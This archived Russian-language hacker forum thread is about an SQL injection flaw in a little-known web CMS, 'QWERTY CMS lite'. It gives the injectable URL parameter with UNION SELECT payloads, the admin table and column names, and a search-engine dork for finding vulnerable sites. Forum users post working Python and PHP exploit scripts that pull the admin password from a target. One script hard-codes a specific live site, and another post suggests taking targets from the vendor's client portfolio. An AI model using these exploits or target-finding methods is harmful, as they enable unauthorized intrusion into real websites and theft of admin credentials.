PDA

Просмотр полной версии : QWERTY CMS lite - SQL INJ


b3
18.02.2009, 22:37
http://s49.radikal.ru/i126/0902/a7/2d2c287a9152.jpg

Нашел уязвимость SQL INJ в одной малоизвестной QWERTY CMS lite. В гугле даже несмог найти авторов сего творения.
Уязвимость в файле index.php, уязвимый параметр id:
index.php?act=publ&id=-3+UNION+SELECT+1,2,3,4,5
Таблица администратора:rkh8t5po
клонки:
secret873ktlW
pass459khyf
Пароль от админки находится в колонке pass459khyf Логин: admin
Путь к Админке:
/admin/
http://www.milw0rm.com/exploits/8104

Assembler
19.02.2009, 01:37
http://www.google.ru/search?q=allinurl%3A+php%3Fact%3Dpubl%26id%3D&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:ru:official&client=firefox-a

Да уж -) совсем мало популярная..

faza02
24.02.2009, 23:58
#!/usr/bin/python
#QWERTY CMS expl01t
#http://sql.parsers.info
#faza02[at]gmail[dot]com
#thx login999

import urllib
import re
print "qwerty cms expl01t by faza02\n\nexample: site.com"
site=raw_input(u'site: ')
site1='http://' + site + '/index.php?act=publ&id=38+and+0+UNION+SELECT+1,unhex(hex(pass459khyf)) ,3,4,5+from+rkh8t5po'

pars=str(urllib.urlopen(site1).read())
title=re.findall(r'\<title\>.*?\<\/title\>',pars)
per=str(title)[2:-2]
per=per.replace('<title>','')
per=per.replace('</title>','')
print 'login: admin'
print 'passw0rd: ' + per
(с) faza02

mailbrush
25.02.2009, 01:22
QWERTY CMS lite PHP Injector by mailbrush
<?
$site="http://dr-gng.dp.ua"; //сайт для инжекта
function db($url){
$url=$url."/index.php?act=publ&id=-9+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5";
$fp=file_get_contents($url);
list($ds,$f)=explode('<title>',$fp);
list($ds,$f)=explode('</title>',$f);
return $ds;
}

function user($url){
$url=$url."/index.php?act=publ&id=-9+union+select+1,concat(0x61646d696e3a,pass459khyf ),3,4,5+from+rkh8t5po";
$fp=file_get_contents($url);
list($ds,$f)=explode('<title>',$fp);
list($ds,$f)=explode('</title>',$f);
return $ds;
}

echo "<b>user():database():version() - </b>".db($site)."<br>";
echo "<b>admin:pass - </b>".user($site)."<br>";
?>

login999
25.02.2009, 02:21
Это ж все зависит от того, как писать, можно то его и на socket написать :), а толку ? Python славится невьебённым количеством модулей, можешь взглянуть здесь :
http://docs.python.org/modindex.html , этот код можно было написать на как минимум трех модулях, причем аобсолютно без проблем :)
P.S.
Переделал код в духе минимализма :) :

#!/usr/bin/python
#QWERTY CMS expl01t
#http://sql.parsers.info
#faza02[at]gmail[dot]com
#thx login999
import urllib, re
print "qwerty cms expl01t by faza02\n\nexample: site.com"
print 'login: admin & passw0rd: ' + str(re.findall(r'\<title\>.*?\<\/title\>',str(urllib.urlopen("http://" + raw_input(u'site: ') + "/index.php?act=publ&id=38+and+0+UNION+SELECT+1,unhex(hex(pass459khyf)) ,3,4,5+from+rkh8t5po").read())))[2:-2].replace("<title>",'').replace("</title>",'')


Из 8 строчек кода 4 строчки - цоперайты :)
P.S. Ачат "обезвреживает" спец символы, поэтому в сплоенте после (pass459khyf)) не должно быть 2 пробела, снесите их нафик :)

Glazz
25.02.2009, 17:04
Портфолио их групы , там адресочки можно взять, но спосов Assembler то же норм.
http://web-sites.kiev.ua/portfolio.php

А там реально ип админку отправляется при не праивльном заходе в админку?